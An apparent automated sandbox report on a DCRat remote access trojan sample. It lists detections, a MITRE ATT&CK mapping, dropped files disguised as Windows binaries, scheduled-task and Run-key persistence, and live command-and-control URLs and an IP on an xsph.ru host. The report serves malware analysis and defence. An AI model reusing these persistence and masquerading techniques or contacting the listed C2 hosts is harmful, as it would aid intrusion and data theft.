Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006FD5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

0_2_006FD5D4

Source: C:\Users\user\Desktop\LisectAVT_2403002A_442.exe

Code function: 0_2_006EACF5 GetVersionExW,

0_2_006EACF5

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728, type: MEMORYSTR

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: perfCrtmonitorsvcMonitorDll.exe PID: 7728, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scheduled Task/Job	12 Process Injection	331 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	11 Scripting	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	21 Registry Run Keys / Startup Folder	21 Registry Run Keys / Startup Folder	31 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	12 Process Injection	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	3 Software Packing	DCSync	37 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
LisectAVT_2403002A_442.exe	100%	Avira	VBS/Runner.VPG
LisectAVT_2403002A_442.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Recovery\jOMfQSwRhTi.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe	100%	Avira	VBS/Runner.VPG
C:\Windows\System32\WWanAPI\dwm.exe	100%	Avira	HEUR/AGEN.1323343
C:\Recovery\jOMfQSwRhTi.exe	100%	Avira	HEUR/AGEN.1323343
C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat	100%	Avira	BAT/Delbat.C
C:\Windows\ShellNew\WinStore.App.exe	100%	Avira	HEUR/AGEN.1323343
C:\Recovery\jOMfQSwRhTi.exe	100%	Avira	HEUR/AGEN.1323343
C:\Windows\hh\explorer.exe	100%	Avira	HEUR/AGEN.1323343
C:\Recovery\jOMfQSwRhTi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	100%	Joe Sandbox ML
C:\Windows\System32\WWanAPI\dwm.exe	100%	Joe Sandbox ML
C:\Recovery\jOMfQSwRhTi.exe	100%	Joe Sandbox ML
C:\Windows\ShellNew\WinStore.App.exe	100%	Joe Sandbox ML
C:\Recovery\jOMfQSwRhTi.exe	100%	Joe Sandbox ML
C:\Windows\hh\explorer.exe	100%	Joe Sandbox ML

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5v	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm	100%	Avira URL Cloud	malware
https://steamcommunity.com/profiles/	0%	Avira URL Cloud	safe
http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13	100%	Avira URL Cloud	malware
http://a0583448.xsph.ru/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a0583448.xsph.ru	141.8.197.42	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt=cymBgcrFuUFRpewDbkyXudFCl&ZJ3cpCq94lDwcb=6kKMgY50yz3TVC8tjaFDiMSoDlqkK	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5vuWYlripL	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&2bGs=iEebvFdRV2KfjpT6qy&YnOt1NzY3yp8L=1nvXnnSLS7uFD0eVJL	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&qCFOYAIwvpUHNGAS5F6bha=oglzIDaRId7nS4uU7fBHp&gohOiji0=IPYbrxK9sUXLoPdr	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=QZzADZhdjZxIGO4QDO0ITOyUDMjdjNwYzN3YjNiZDOilzN2AjN0EGO&YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://a0583448.xsph.ru/HttpCpu.php?Z3DPO5MO2Kls4kB=n03j5lcn0S1dKbm&c43ad04a366e3e13d187a2f4f0fffdd3	explorer.exe, 00000010.00000002.1484541744.000000000374B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1484541744.0000000003777000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?YTh3ufPQGcMG3QNXqrKTUZNjJDX=qmsyYKg8QxN&c43ad04a366e3e13d187a2f4	explorer.exe, 0000001A.00000002.1815551344.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://steamcommunity.com/profiles/	perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1438279004.00000000132C1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://a0583448.xsph.ru/HttpCpu.php?JguO4La5pQKN8nwc=6Wnlvd00Bm49&gyyX5OxKdcmS76gDltEGlaNJ1YC3=2if5v	dwm.exe, 00000016.00000002.1577433938.000000000304B000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000016.00000002.1577433938.000000000307A000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?egSzliE1vjRZ7aATd0=eQrb1MtQjsBwzkVYe&vvuJKZwWapy84nBVfSxEam1ReIt	jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025F8000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru	explorer.exe, 0000001A.00000002.1815551344.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A76000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	perfCrtmonitorsvcMonitorDll.exe, 00000005.00000002.1437215349.00000000034B7000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000000F.00000002.1476099366.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.1484541744.000000000374B000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 00000016.00000002.1577433938.000000000304B000.00000004.00000800.00020000.00000000.sdmp, jOMfQSwRhTi.exe, 00000018.00000002.1647819226.00000000025CE000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://a0583448.xsph.ru/	explorer.exe, 0000001A.00000002.1815551344.0000000002A54000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://a0583448.xsph.ru/HttpCpu.php?YdE=LzctCvlE2&IflMqVEea0RQ7qWO8zQYTmmGlF=jTqo1R&c43ad04a366e3e13	dwm.exe, 0000000F.00000002.1476099366.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, dwm.exe, 0000000F.00000002.1476099366.0000000002D4B000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
141.8.197.42	a0583448.xsph.ru	Russian Federation		35278	SPRINTHOSTRU	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1482252
Start date and time:	2024-07-25 20:03:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	31
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	LisectAVT_2403002A_442.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@28/22@1/1
EGA Information:	Successful, ratio: 11.1%
HCA Information:	Successful, ratio: 55% Number of executed functions: 462 Number of non-executed functions: 115
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WinStore.App.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WinStore.App.exe, PID 7284 because it is empty
Execution Graph export aborted for target dwm.exe, PID 336 because it is empty
Execution Graph export aborted for target dwm.exe, PID 8040 because it is empty
Execution Graph export aborted for target explorer.exe, PID 3476 because it is empty
Execution Graph export aborted for target explorer.exe, PID 8052 because it is empty
Execution Graph export aborted for target jOMfQSwRhTi.exe, PID 4712 because it is empty
Execution Graph export aborted for target jOMfQSwRhTi.exe, PID 8068 because it is empty
Execution Graph export aborted for target perfCrtmonitorsvcMonitorDll.exe, PID 7728 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: LisectAVT_2403002A_442.exe

Simulations

Behavior and APIs

Time	Type	Description
14:04:07	API Interceptor	16x Sleep call for process: dwm.exe modified
14:04:08	API Interceptor	16x Sleep call for process: explorer.exe modified
14:04:24	API Interceptor	9x Sleep call for process: jOMfQSwRhTi.exe modified
19:04:05	Task Scheduler	Run new task: dwm path: "C:\Windows\System32\WWanAPI\dwm.exe"
19:04:05	Task Scheduler	Run new task: explorer path: "C:\Windows\hh\explorer.exe"
19:04:05	Task Scheduler	Run new task: jOMfQSwRhTi path: "C:\Recovery\jOMfQSwRhTi.exe"
19:04:05	Task Scheduler	Run new task: WinStore.App path: "C:\Windows\ShellNew\WinStore.App.exe"
19:04:06	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dwm "C:\Windows\System32\WWanAPI\dwm.exe"
19:04:14	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run jOMfQSwRhTi "C:\Recovery\jOMfQSwRhTi.exe"
19:04:23	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WinStore.App "C:\Windows\ShellNew\WinStore.App.exe"
19:04:31	Autostart	Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Windows\hh\explorer.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
141.8.197.42	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse	a0583448.xsph.ru/HttpCpu.php?Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp&c43ad04a366e3e13d187a2f4f0fffdd3=7dce47940ffc35c44d1d7554ed3fdd89&4405def633a99e58044aae91701cfdda=AMkVmY1cDNihjYmNDZmFzYjFTOwU2Y3YDZ4QjMjRWMzIWNxIWO1M2N&Etdqn=ESdpfxAWldlPKJ94kNlqAXCtp
	quotation.doc	Get hash	malicious	Unknown	Browse	a0862680.xsph.ru/djlipantro2.1.exe
	HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Get hash	malicious	BlackNET	Browse	f0575824.xsph.ru/blacknet/receive.php?command=VW5pbnN0YWxs&vicID=SGFjS2VkXzdGOTRDM0I1
	442.111).lnk	Get hash	malicious	Unknown	Browse	a0705880.xsph.ru/selection/seedling.txt
	htmlayout.dll	Get hash	malicious	Unknown	Browse	a0747694.xsph.ru/serv.php
	qRsw2oZH24.exe	Get hash	malicious	Panda Stealer	Browse	crimestreetsru.ru.xsph.ru/collect.php
	svchost.exe	Get hash	malicious	Panda Stealer	Browse	asdqwezxc.ru.xsph.ru/collect.php
	btwGaban.exe	Get hash	malicious	CollectorGoomba, Panda Stealer	Browse	a0680922.xsph.ru/collect.php
	v8YnxUbz23.exe	Get hash	malicious	Amadey RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe
	6CQieC3oMC.exe	Get hash	malicious	Amadey Raccoon RedLine SmokeLoader Tofsee Vidar	Browse	a0620960.xsph.ru/5.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0583448.xsph.ru	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse	141.8.197.42

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SPRINTHOSTRU	wdOEfoZ2zn.exe	Get hash	malicious	DCRat	Browse	141.8.197.42
	LPpeVU2rxe.exe	Get hash	malicious	DCRat	Browse	141.8.192.6
	8E16230A9D5336FB1D6C6278B45E3B653AA2F6CD060742F28CD68D6A5117A396.exe	Get hash	malicious	Bdaejec, DCRat, RedLine	Browse	141.8.197.42
	88YW43jlqt.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	https://sites.google.com/view/intelvest?fJcurFFemrY/home?fVJiBoRTHSMKWyVNNJkTPZNgolCtN?authuser=2?exyFFKRYcyzAMCsLkcrkWlGrYRNgWcZSZN	Get hash	malicious	Unknown	Browse	141.8.192.163
	oiO6P0pw3g.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	WaGEjB6fXN.exe	Get hash	malicious	DCRat	Browse	141.8.192.103
	DeqcE30sLb.exe	Get hash	malicious	DCRat	Browse	141.8.192.151
	wgm8qQc2j4.exe	Get hash	malicious	DCRat	Browse	141.8.192.58
	Mx0UGSI897.exe	Get hash	malicious	DCRat	Browse	141.8.192.58

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse
C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse
C:\Recovery\jOMfQSwRhTi.exe	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse
C:\Users\user\jOMfQSwRhTi.exe	PMDfwr7Jal.exe	Get hash	malicious	DCRat	Browse

Created / dropped Files

C:\Recovery\31997539b722e54a2a7374467bac21ada08fa869

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with very long lines (450), with no line terminators
Category:	dropped
Size (bytes):	450
Entropy (8bit):	5.84673945341941
Encrypted:	false
SSDEEP:	12:1PoecEIsURSEPwm24ODQ4ZRCm4VBtDuGVb:1PxIslF4w1ZRCm0BtJd
MD5:	8BE0ED3EDDBF3E3A1CC3AEBDEE15CA8B
SHA1:	D2C599069F5A5A6519EDD9F5D8A542609C3029F2
SHA-256:	45F6D1A338235AF69B14377CCF85245CC40E5F7B51BA485F0D923DEEE81A9F22
SHA-512:	33BDC2A96DB681DA6B40E7CB20FB8F392FFB0EBFECAC23BD1AC276D32CBB2F2C8FB7C44399B1FEAE4AF3F201435B56C0106D7E8ABB013DADEE943C117728167E
Malicious:	false
Preview:	pCX1T8k1Fec5bf01dfOhGI26qyxpA5JGtCa9LVIQrSvtfes95GMI8TVgJaKeL50KVVMZF0pIX8zxXJbMFyt4tBIZr3zvKnFvclYJST3EaEv9dhJA88YWL5aUMwsMB47t3DVwvR4w5oepPI6JtywLOskgKE7flrDgHBGZLXPqEmbhbvEDzicMHvfKdzlrUYLNl8iOCg8WjGHmRDFZ93qCO1YVg56WviVqaN5dNzBTkFmBo23auMrbsI8ujMsHkmlBuaLDHlLK2WcJOXrnCgli148ROL4AH4t8elRNqzSIBhjVqzfLeEEDADKzc4z5rKC7neomGe7MNchTUmlZpsfDzp7bbbvwAXb0elsLK3FAH20hf0fzSZP9o9I7gNLosKM0Brzt4ZOwmf56za5l65ekHbLfcup7sbS6pAfyBw42LdXJDLIGSjswqlsjfTQKuQDKM8

C:\Recovery\jOMfQSwRhTi.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1977344
Entropy (8bit):	7.384250632620979
Encrypted:	false
SSDEEP:	49152:9Eln+8YPyZc6wkQbPVqlC8m5saKHaFg3:mJ+lyZKjVJDWaA
MD5:	64B3CA21D783CFB2DDE3FFBAFBF1797F
SHA1:	822549C0B397FEEB5105C1EBFE570DDF685C926B
SHA-256:	91167E5876C370F49654A0749590B162B9432108940F84CF77690E26E367955C
SHA-512:	D6BE88CE1EA5D6A54C07B56A8CB682FAE729CFAAE9758ED3CADA42988C89A8A9B7DC038E754B06F8CB737602FE1D3B941C067E7E166C10A30E6541BEE57EFDE3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: PMDfwr7Jal.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.ba.....................Z........... ........@.. ....................................@.....................................K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata...R.......T..................@....rsrc........`.......&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\AccountPictures\31997539b722e54a2a7374467bac21ada08fa869

Download File

Process:	C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	5.517111829471087
Encrypted:	false
